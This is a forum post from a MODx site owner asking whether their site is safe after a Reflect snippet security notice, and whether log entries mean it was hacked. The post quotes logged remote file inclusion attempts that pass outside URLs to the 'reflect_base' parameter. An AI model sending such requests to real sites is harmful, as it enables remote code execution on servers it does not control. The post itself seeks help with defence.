I am running MODx 0.9.6.3. In both CPanel and PHPInfo(), Register Globals is OFF (the server is running PHP 5.2.6). There is no snippet.reflect.php file in /assets/snippets/reflect/snippet.reflect.php ... I am assuming this is because it was removed from the download version back in November according to the Security Notice, whereas I only downloaded within the past few weeks.
Or rather, I am *hoping* this is the case. From reading this thread and the Security Notice, my understanding is that as long as Register Globals is off, and there is no file called snippet.reflect.php, then I am okay? Because I have seen a lot of activity like this in logs today:
//snippet.reflect.php?reflect_base=
http://almanachtur.ru/images/crutz.txt?????
/assets/snippets/reflect/snippet.reflect.php?reflect_base=
http://64.13.230.27/logs/tst.txt??
I am not sure what the info in the log means. Are these just attempts, or do these entries mean someone’s actually managed to hack the site?
I guess my main concern is that the Secunia advisory mentions possible username input exploits and SQL injections as well as the problem with the "reflect_base" parameter. The way the advisory reads, only the "reflect_base" parameter exploit is cured by Register Globals being set to OFF. My paranoid mind is wondering about the username and SQL injections as well.
Thanks in advance for any light shed.